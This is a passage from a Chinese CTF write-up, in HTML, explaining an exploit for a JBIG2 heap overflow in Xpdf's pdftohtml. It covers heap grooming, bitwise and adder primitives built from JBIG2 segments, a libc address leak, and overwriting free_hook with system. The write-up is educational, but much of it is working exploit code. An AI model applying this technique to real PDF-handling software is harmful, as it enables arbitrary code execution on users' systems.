class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Trigger the out-of-bound write.</span></span><br><span class="line">TextRegion(</span><br><span class="line">    <span class="number">102</span>,</span><br><span class="line">    w=<span class="number">1</span>,</span><br><span class="line">    h=<span class="number">1</span>,</span><br><span class="line">    x=<span class="number">0</span>,</span><br><span class="line">    y=<span class="number">0</span>,</span><br><span class="line">    <span class="comment"># size_to_overflow // 8 个指针</span></span><br><span class="line">    ref_segs=[<span class="number">1</span>] </span><br><span class="line">    <span class="comment"># 0x10000 + (syms_size - size_to_overflow) // 8 个指针</span></span><br><span class="line">    + [<span class="number">2</span>] * (<span class="number">0x10000</span> + (syms_size - size_to_overflow) // <span class="number">8</span>)</span><br><span class="line">    <span class="comment"># 共 0xffff0000 个指针</span></span><br><span class="line">    + [<span class="number">0</span>] * <span class="number">0xFFFF</span>, </span><br><span class="line">),</span><br></pre></td></tr></table></figure><p>上面代码的组合中，</p><p>$$size_to_overflow / 8 + {0x10000 + (syms_size - size_to_overflow) / 8} + 0xffff0000 = 0x100000000 + syms_size/8$$，即刚好分配 syms_size 个字节。</p><p>又因为先 ref 的那个 Symbol Dict 的大小为 <code>size_to_overflow // 8</code> 个指针。因此当 readTextRegion 解析第一个 ref 的 Symbol Dict 时，刚好向 syms 堆块中写入 <code>size_to_overflow</code> 个字节，直接溢出至 pageBitmap JBIG2Bitmap 结构体头部位置，如此便能达到溢出的目的。</p><p>这里说明一下 size_to_overflow 是怎么得出的，先上堆布局：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// low address --------------------------------------------</span></span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment">    一些其他的堆块分配，包括 </span></span><br><span class="line"><span class="comment">    1. size=8 的 global GList backing store</span></span><br><span class="line"><span class="comment">    2. DummyAlloc</span></span><br><span class="line"><span class="comment">    3. SymbolDict0、1、2</span></span><br><span class="line"><span class="comment">    4. ...</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line">SymbolDict3<span class="number">-8</span>;</span><br><span class="line">pageBitmap backing buffer <span class="comment">// size=16 的 global GList backing store 堆空洞</span></span><br><span class="line">SymbolDict9<span class="number">-16</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 从此处开始写入数据</span></span><br><span class="line">syms <span class="comment">// syms 的 size 为 syms_size</span></span><br><span class="line">SymbolDict17<span class="number">-32</span>; <span class="comment">// 16 个 SymbolDict 的 size，一个 SymbolDict 的 size 为 0x40 字节</span></span><br><span class="line">size=<span class="number">64</span> 的 global GList backing store; <span class="comment">// 此时的 Glist size 为 GLIST_DATA_SIZE</span></span><br><span class="line">pageBitmap JBIG2Bitmap 结构体  <span class="comment">// 这里还需要覆写 vtble + segNum + w + h + line，共24字节</span></span><br><span class="line">    </span><br><span class="line"><span class="comment">// high address -------------------------------------------</span></span><br></pre></td></tr></table></figure><p>根据堆布局可得知：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">size_to_overflow = (</span><br><span class="line">    ptmalloc_chunk_size(syms_size)</span><br><span class="line">    <span class="comment"># 40: sizeof(JBIG2SymbolDict); there are (glist_capacity // 2) irrelevant JBIG2SymbolDict-s</span></span><br><span class="line">    + ptmalloc_chunk_size(<span class="number">40</span>) * (glist_capacity // <span class="number">2</span>)</span><br><span class="line">    + ptmalloc_chunk_size(GLIST_DATA_SIZE)</span><br><span class="line">    <span class="comment"># Current page JBIG2Bitmap</span></span><br><span class="line">    <span class="comment"># vtbl(8)</span></span><br><span class="line">    + <span class="number">8</span></span><br><span class="line">    <span class="comment"># segNum(4), w(4), h(4), line(4)</span></span><br><span class="line">    + <span class="number">4</span> * <span class="number">4</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>之后，将 readTextRegionSeg 中刚刚被释放掉的那个 syms_size 大小的堆块再次分配回来，防止在后续的利用中出现可能的崩溃。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Take back the free-d syms, hold it to prevent potential crash.</span></span><br><span class="line">GenericRegion(<span class="number">103</span>, imm=<span class="literal">False</span>, bitmap=Bitmap(<span class="number">8</span>, syms_size)),</span><br></pre></td></tr></table></figure><p>由于越界写入 pageBitmap JBIG2Bitmap 结构体头部位置的是<strong>指针值</strong>，可以越界读写的数据有限，因此我们需要根据这个有限的 pageBitmap 越界读写原语，来自己修改自己的 JBIG2Bitmap 结构体头，将其中的 w\h\line 修改的更大，扩展自己的读写范围。根据上面的堆布局，同样可以得出 <code>page_bitmap_buf</code> 至 <code>pageBitmap JBIG2Bitmap</code> 的距离：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">page_bitmap_buf_to_class_offset = (</span><br><span class="line">    <span class="built_in">ptmalloc_chunk_size</span>(GLIST_DATA_SIZE <span class="comment">// 4)</span></span><br><span class="line">    + <span class="built_in">ptmalloc_chunk_size</span>(<span class="number">40</span>) * (glist_capacity <span class="comment">// 4)</span></span><br><span class="line">    + size_to_overflow</span><br><span class="line">    - <span class="number">4</span> * <span class="number">4</span></span><br><span class="line">    - <span class="number">8</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>之后将其 w\h\line 分别更改为 $w=2^{27}$、$h=2^{24}$、$line=2^{24}$：</p><blockquote><p>imm 为 true 表示即时渲染，即立即修改 pageBitmap 上的指定位置。</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Overwrite pageBitmap-&gt;w, h and line</span></span><br><span class="line">GenericRegion(</span><br><span class="line">    <span class="number">104</span>,</span><br><span class="line">    x=(page_bitmap_buf_to_class_offset + <span class="number">12</span>) * <span class="number">8</span>,</span><br><span class="line">    y=<span class="number">0</span>,</span><br><span class="line">    comb_op=CombOp.Replace,</span><br><span class="line">    <span class="comment"># (x, y) -&gt; mem[(y &lt;&lt; 24) | (x &gt;&gt; 3)] &gt;&gt; (7 - (x &amp; 7)), max 48-bit addressing</span></span><br><span class="line">    bitmap=Bitmap(struct.pack(<span class="string">&quot;&lt;III&quot;</span>, <span class="number">2</span> ** <span class="number">27</span>, <span class="number">2</span> ** <span class="number">24</span>, <span class="number">2</span> ** <span class="number">24</span>)),</span><br><span class="line">    imm=<span class="literal">True</span>,</span><br><span class="line">),</span><br></pre></td></tr></table></figure><p>修改后的 pageBitmap 的二维空间构造：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">+------------------&gt; w=2^27 bit</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">|</span><br><span class="line">V h=2^24 bit</span><br></pre></td></tr></table></figure><p>最后创建带有 16 个 Bitmap 的 SymbolDict ，以备接下来的利用所使用：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 16 &quot;variables&quot;. Since we can only do bitwise operations relative to page bitmap</span></span><br><span class="line"><span class="comment"># with Refinement regions, we need these variables for peeking other absolute</span></span><br><span class="line"><span class="comment"># addresses, and also rebase the page bitmap in one segment command.</span></span><br><span class="line">SymbolDict(<span class="number">105</span>, [Bitmap(<span class="number">64</span>, <span class="number">1</span>)] * <span class="number">16</span>)</span><br></pre></td></tr></table></figure><p>这些 SymbolDict 将用于<strong>地址解引用原语</strong>中，具体在下面会详细介绍。</p><blockquote><p>整体的堆风水布局大体如上所示。完成堆溢出后，pageBitmap 具备了大偏移读写的功能，因此接下来就要开始写原语利用了。</p></blockquote><h3 id="2-位运算原语">2. 位运算原语</h3><p>还记得先前介绍的 <code>GenericRefinementRegionSeg</code> 么（不记得就翻到上面看看），接下来我们需要利用这个 seg 的特性来编写任意位的位运算器。</p><p>exploit 中实现的位运算器如下所示：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">BitSeg</span>:</span><br><span class="line">    _seq = itertools.count(<span class="number">10000</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, seg_num</span>):</span><br><span class="line">        <span class="variable language_">self</span>.seg_num = seg_num</span><br><span class="line">        <span class="variable language_">self</span>.__consumed = <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">consume</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">assert</span> <span class="keyword">not</span> <span class="variable language_">self</span>.__consumed</span><br><span class="line">        <span class="variable language_">self</span>.__consumed = <span class="literal">True</span></span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>.seg_num</span><br><span class="line"></span><br><span class="line"><span class="meta">    @classmethod</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">from_page</span>(<span class="params">cls, offset</span>):</span><br><span class="line">        x, y = offset % <span class="number">2</span> ** <span class="number">27</span>, offset // <span class="number">2</span> ** <span class="number">27</span></span><br><span class="line">        idx = <span class="built_in">next</span>(cls._seq)</span><br><span class="line">        page0.append(ReadoutRefinement(idx, x=x, y=y, imm=<span class="literal">False</span>))</span><br><span class="line">        <span class="keyword">return</span> cls(idx)</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">CombOp</span>(enum.IntEnum):</span><br><span class="line">    Or = <span class="number">0</span></span><br><span class="line">    And = <span class="number">1</span></span><br><span class="line">    Xor = <span class="number">2</span></span><br><span class="line">    Xnor = <span class="number">3</span></span><br><span class="line">    Replace = <span class="number">4</span></span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">bitop</span>(<span class="params">oa, ob, op: CombOp</span>):</span><br><span class="line">    b = BitSeg.from_page(ob)</span><br><span class="line">    x, y = oa % <span class="number">2</span> ** <span class="number">27</span>, oa // <span class="number">2</span> ** <span class="number">27</span></span><br><span class="line">    page0.append(</span><br><span class="line">        ReadoutRefinement(<span class="number">65536</span>, x=x, y=y, imm=<span class="literal">True</span>, ref=b.consume(), comb_op=op)</span><br><span class="line">    )</span><br></pre></td></tr></table></figure><blockquote><p>原语 <code>bitop</code> 的 <code>oa</code>、<code>ob</code> 两个参数的<strong>单位为 bit</strong>，<code>op</code> 有 5 种。</p></blockquote><p>bitop 原语初始时将一维偏移量 oa、ob 分别<strong>映射</strong>至 bitmap 的二维偏移量 xy1、xy2，之后在解析 ob 对应的 RefinementRegionSeg 时，从 pageBitmap 中取出对应 xy2 的数据，并将其存入 segments 中。</p><blockquote><p>一维偏移量向二维偏移量映射时，为什么使用的是 2^27 作为除数/模数呢？因为这是上面所修改后的 width 的大小。</p></blockquote><p>接下来当 hso 解析 oa 对应的 RefinementRegionSeg 时，hso 会重新读入先前存入的 ob 对应的 RefinementRegion，并将其与 pageBitmap 特定 xy1 位置进行位运算，达到<strong>指定 pageBitmap 上任意两位之间进行位运算</strong>的目的。</p><p>这里需要注意的是，findSegment 查找算法的核心，是<strong>依次遍历 segments 列表的元素并比对 segNum 来进行查找</strong>。因此每次添加进 segment 的 RefinementRegion，其 <strong>segNum 一定不能与之前 append 进去的 segments 相同！</strong></p><p>当位运算原语 <code>binop</code> 可用后，接下来就可以构建其他原语：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">bitwise_mov = <span class="keyword">lambda</span> a, b: bitop(a, b, CombOp.Replace)</span><br><span class="line">bitwise_xor = <span class="keyword">lambda</span> a, b: bitop(a, b, CombOp.Xor)</span><br><span class="line">bitwise_and = <span class="keyword">lambda</span> a, b: bitop(a, b, CombOp.And)</span><br><span class="line">bitwise_or = <span class="keyword">lambda</span> a, b: bitop(a, b, CombOp.Or)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">op_q_q</span>(<span class="params">oa, ob, op: CombOp</span>):</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line">        bitop(oa * <span class="number">8</span> + i, ob * <span class="number">8</span> + i, op)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Offsets are in bytes.</span></span><br><span class="line">mov_q_q = <span class="keyword">lambda</span> a, b: op_q_q(a, b, CombOp.Replace)</span><br><span class="line">xor_q_q = <span class="keyword">lambda</span> a, b: op_q_q(a, b, CombOp.Xor)</span><br><span class="line">and_q_q = <span class="keyword">lambda</span> a, b: op_q_q(a, b, CombOp.And)</span><br><span class="line">or_q_q = <span class="keyword">lambda</span> a, b: op_q_q(a, b, CombOp.Or)</span><br></pre></td></tr></table></figure><p>这里的 <code>op_q_q</code> 原语，其 oa、ob 参数的<strong>单位为字节</strong>（注意和 binop 的单位并不相同）。</p><p><code>op_q_q</code> 原语的目的，是对给定 <code>oa</code> 和 <code>ob</code> 的相对一维偏移字节所对应的两个位置，做一次<strong>8字节位运算</strong>。</p><p>举个例子，原语 <code>and_q_q(0, 8)</code>，执行的操作为：</p><ul><li>将<strong>偏移量为 0字节</strong> 的位置上的八字节(即 0-7 这8个字节)，与 <strong>偏移量为 8字节</strong> 的位置上的 八字节（即 8-15 这8字节），进行一次一一对应的 and 运算。</li><li>将运算结果放置在<strong>偏移量为 0字节</strong> 的位置上的八字节(即 0-7 这8个字节)上。</li></ul><blockquote><p>这个原语其实很好理解，只是用文字记录下来感觉不太好记录，也可能是我文笔不太好。</p></blockquote><p>之后便是通过位运算来构建8字节全加器，可以先看看<a href="https://developer.aliyun.com/article/593228">这篇文章</a>再看看代码：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Don&#x27;t worry, Libra won&#x27;t hu^W^W^W Xpdf allocates 1 more byte</span></span><br><span class="line">adder_buf_offset = GLIST_DATA_SIZE // <span class="number">4</span> * <span class="number">8</span> <span class="comment"># 1024</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add_q_q</span>(<span class="params">oa, ob</span>):</span><br><span class="line">    oa, ob = oa * <span class="number">8</span>, ob * <span class="number">8</span></span><br><span class="line">    ab_xor, ab_and, carry, ab_xor_c_and, zero = <span class="built_in">range</span>(</span><br><span class="line">        adder_buf_offset, adder_buf_offset + <span class="number">5</span></span><br><span class="line">    )</span><br><span class="line">    <span class="comment"># 初始时，最低位全加器的进位标志为0</span></span><br><span class="line">    bitwise_mov(carry, zero)</span><br><span class="line">    <span class="comment"># 8字节 = 64 位，因此这里的 range 为 64</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line">        <span class="comment"># 这里是每个 **位** 的全加器，一个全加器由两个半加器构成</span></span><br><span class="line">        a_bit_offset = oa + i // <span class="number">8</span> * <span class="number">8</span> + (<span class="number">7</span> - i % <span class="number">8</span>)</span><br><span class="line">        b_bit_offset = ob + i // <span class="number">8</span> * <span class="number">8</span> + (<span class="number">7</span> - i % <span class="number">8</span>)</span><br><span class="line">        <span class="comment"># This is a naive full-adder. Applying TIS-100 skill could cut 3~4 ops maybe.</span></span><br><span class="line">        <span class="comment"># 首先是第一个半加器</span></span><br><span class="line">        bitwise_mov(ab_xor, a_bit_offset)</span><br><span class="line">        bitwise_xor(ab_xor, b_bit_offset)</span><br><span class="line">        bitwise_mov(ab_and, a_bit_offset)</span><br><span class="line">        bitwise_and(ab_and, b_bit_offset)</span><br><span class="line">        <span class="comment"># 其次是第二个半加器</span></span><br><span class="line">        bitwise_mov(a_bit_offset, ab_xor)</span><br><span class="line">        bitwise_xor(a_bit_offset, carry)  <span class="comment"># output (S)</span></span><br><span class="line">        bitwise_mov(ab_xor_c_and, ab_xor)</span><br><span class="line">        bitwise_and(ab_xor_c_and, carry)</span><br><span class="line">        <span class="comment"># 设置进位标志</span></span><br><span class="line">        bitwise_mov(carry, ab_and)</span><br><span class="line">        bitwise_or(carry, ab_xor_c_and)</span><br></pre></td></tr></table></figure><p>其全加器结构如下所示：</p><p><img src="/2022/02/rwctf2022_hso/39673408-3e4f3e44-516e-11e8-8c7b-1d78b3f7f28b.png" alt="1582983175-59c4f8cba758f_articlex"></p><h3 id="3-立即数运算原语">3. 立即数运算原语</h3><p>除了上面所介绍的位运算原语以外，还有加载外部立即数计算的原语。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">op_q_imm</span>(<span class="params">offset, imm, op</span>):</span><br><span class="line">    offset *= <span class="number">8</span></span><br><span class="line">    x, y = offset % <span class="number">2</span> ** <span class="number">27</span>, offset // <span class="number">2</span> ** <span class="number">27</span></span><br><span class="line">    page0.append(</span><br><span class="line">        GenericRegion(</span><br><span class="line">            <span class="number">233</span>, x=x, y=y, comb_op=op, bitmap=Bitmap(struct.pack(<span class="string">&quot;&lt;Q&quot;</span>, imm)), imm=<span class="literal">True</span></span><br><span class="line">        )</span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">mov_q_imm = <span class="keyword">lambda</span> o, imm: op_q_imm(o, imm, CombOp.Replace)</span><br><span class="line">xor_q_imm = <span class="keyword">lambda</span> o, imm: op_q_imm(o, imm, CombOp.Xor)</span><br><span class="line">and_q_imm = <span class="keyword">lambda</span> o, imm: op_q_imm(o, imm, CombOp.And)</span><br><span class="line">or_q_imm = <span class="keyword">lambda</span> o, imm: op_q_imm(o, imm, CombOp.Or)</span><br></pre></td></tr></table></figure><p>readGenericRegionSeg 方法可从外部 JBIG2Stream 流中读入一个 bitmap 并将其与 pageBitmap 上的特定位置进行运算，因此 GenericRegionSeg 可用于此处的立即数运算原语。</p><h3 id="4-地址解引用原语">4. 地址解引用原语</h3><p>当我们有了某个指针的绝对地址后，我们如何将这个指针从该绝对地址中读取出来呢？这就需要用到地址解引用操作。这里，exploit 准备了两个原语：</p><ul><li><p><code>rebase_variable_q</code>：将 pageBitmap 中一维偏移为 <code>addr_page_offset</code> 处的 8 字节数据，复制进<strong>堆风水中最后一步所创建的</strong>带有 16 个 Bitmap 的 SymbolDict 中，第 idx 个 JBIG2Bitmap 的 <strong>data 字段</strong>上：</p><blockquote><p>注意，是直接将值覆盖在 JBIG2Bitmap 的 data 字段上，<strong>而不是</strong>写进 data 指针所指向的内存上。</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">rebase_variable_q</span>(<span class="params">idx, addr_page_offset</span>):</span><br><span class="line">    mov_q_q(</span><br><span class="line">        variable_bitmap_offset + idx * ptmalloc_chunk_size(<span class="number">0x20</span>) + <span class="number">0x18</span>,</span><br><span class="line">        addr_page_offset,</span><br><span class="line">    )</span><br></pre></td></tr></table></figure></li><li><p><code>load_variable</code>：读取最后一个 Symbol Dict 中，第 idx 个 JBIG2Bitmap <strong>backing store 里的</strong>（即 data 指针解引用后的内存上） 的第一个 8 字节数据，至 pageBitmap 中一维偏移为 <code>to_page_offset</code> 处的 8 字节内存位置。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">load_variable</span>(<span class="params">to_page_offset, idx</span>):</span><br><span class="line">    to_page_offset *= <span class="number">8</span></span><br><span class="line">    x, y = to_page_offset % <span class="number">2</span> ** <span class="number">27</span>, to_page_offset // <span class="number">2</span> ** <span class="number">27</span></span><br><span class="line">    page0.append(</span><br><span class="line">        TextRegion(</span><br><span class="line">            <span class="number">233</span>,</span><br><span class="line">            x=x,</span><br><span class="line">            y=y,</span><br><span class="line">            w=<span class="number">64</span>,</span><br><span class="line">            h=<span class="number">1</span>,</span><br><span class="line">            imm=<span class="literal">True</span>,</span><br><span class="line">            instances=[idx],</span><br><span class="line">            ref_symbol_cnt=<span class="number">16</span>,</span><br><span class="line">            ref_segs=[<span class="number">105</span>],</span><br><span class="line">        )</span><br><span class="line">    )</span><br></pre></td></tr></table></figure></li></ul><p>这两个原语一结合，就能达到地址解引用的目的。</p><h3 id="5-整体利用流程">5. 整体利用流程</h3><p>各类原语已经都准备好了，接下来便是结合这些原语覆写 free_hook 为 libc_system 的地址。</p><p>首先，我们需要 leak 一个地址出来（这个地址自然不能是堆地址），通过查看堆布局：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// low address .....</span></span><br><span class="line">...</span><br><span class="line">SymbolDict3<span class="number">-8</span>;</span><br><span class="line">pageBitmap backing buffer <span class="comment">// size=16 的 global GList backing store 堆空洞</span></span><br><span class="line">SymbolDict9<span class="number">-16</span>;</span><br><span class="line">...</span><br><span class="line"><span class="comment">// high address .....</span></span><br></pre></td></tr></table></figure><p>可以看到紧临着 pageBitmap 的便是 SymbolDict，因此我们可以尝试读取其<strong>虚表指针</strong>。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># vtbl of a JBIG2SymbolDict adajacent to page bitmap buffer</span></span><br><span class="line"><span class="comment"># 取出vtbl地址放到+0处</span></span><br><span class="line">mov_q_q(<span class="number">0</span>, ptmalloc_chunk_size(GLIST_DATA_SIZE // <span class="number">4</span>))</span><br></pre></td></tr></table></figure><p>之后从外部读取一个相对偏移至 pageBitmap data + 8 的位置：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 计算出-vtbl_offset + free_got_offset</span></span><br><span class="line">mov_q_imm(</span><br><span class="line">    <span class="number">8</span>, (-PDFTOHTML_VTBL_JBIG2SYMBOLDICT_OFFSET + PDFTOHTML_FREE_GOT_OFFSET) % <span class="number">2</span> ** <span class="number">64</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure><p>然后再简单做个加法，就能得到 free 条目在 GOT 表上的绝对地址，放到 +0 处：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 计算vtbl地址+(-vtbl_offset + free_got_offset)得到free_got的地址，放到+0处</span></span><br><span class="line">add_q_q(<span class="number">0</span>, <span class="number">8</span>)</span><br></pre></td></tr></table></figure><p>接下来，尝试对该 <code>free.got</code> 地址进行解引用，获取 <code>free.libc</code> 地址：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 从+0处取出free_got的地址，放到第0个&quot;变量&quot;data 指针处</span></span><br><span class="line">rebase_variable_q(<span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line"><span class="comment"># 取出存放在第0个&quot;变量&quot;里的值（此时该值为 libc.free 的绝对地址），放到+8处</span></span><br><span class="line">load_variable(<span class="number">8</span>, <span class="number">0</span>)  <span class="comment"># address of libc.free at +8</span></span><br></pre></td></tr></table></figure><p>在获取到 <code>free.libc</code> 地址后，读入一个相对偏移并做个加法，经过简单几步，我们便能得到 <code>free_hook</code> 和 <code>libc_system</code> 的绝对地址：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 把LIBC_FREE_OFFSET这个立即数的值放到+0处</span></span><br><span class="line">mov_q_imm(<span class="number">0</span>, -LIBC_FREE_OFFSET % <span class="number">2</span> ** <span class="number">64</span>)</span><br><span class="line"><span class="comment"># 计算free_got的地址+(-libc_free_offset)，得到libc基地址，放到+8处</span></span><br><span class="line">add_q_q(<span class="number">8</span>, <span class="number">0</span>)</span><br><span class="line"><span class="comment"># 复制+8处存放的libc基地址至+0处</span></span><br><span class="line">mov_q_q(<span class="number">0</span>, <span class="number">8</span>)</span><br><span class="line"><span class="comment"># 把LIBC_FREE_HOOK_OFFSET这个立即数放到+16处</span></span><br><span class="line">mov_q_imm(<span class="number">16</span>, LIBC_FREE_HOOK_OFFSET)</span><br><span class="line"><span class="comment"># 计算出libc基地址+LIBC_FREE_HOOK_OFFSET,即free_hook的绝对地址，放到+0处</span></span><br><span class="line">add_q_q(<span class="number">0</span>, <span class="number">16</span>)</span><br><span class="line"><span class="comment"># 取出system的偏移这个立即数，放到+16处</span></span><br><span class="line">mov_q_imm(<span class="number">16</span>, LIBC_SYSTEM_OFFSET)</span><br><span class="line"><span class="comment"># 计算出system的绝对地址，放到+8处</span></span><br><span class="line">add_q_q(<span class="number">8</span>, <span class="number">16</span>)</span><br></pre></td></tr></table></figure><p>注意，此时 <code>pageBitmap-&gt;data</code> 上的数据为：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">+0: free_hook_address     +8: libc_system_address</span><br></pre></td></tr></table></figure><p>接下来便是计算 <code>pageBitmap-&gt;data + 8</code> 的地址，即存放着这个 <code>libc_system_address</code> 值的内存地址：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 取出pagebitmap的data指针，放到+24处</span></span><br><span class="line">mov_q_q(<span 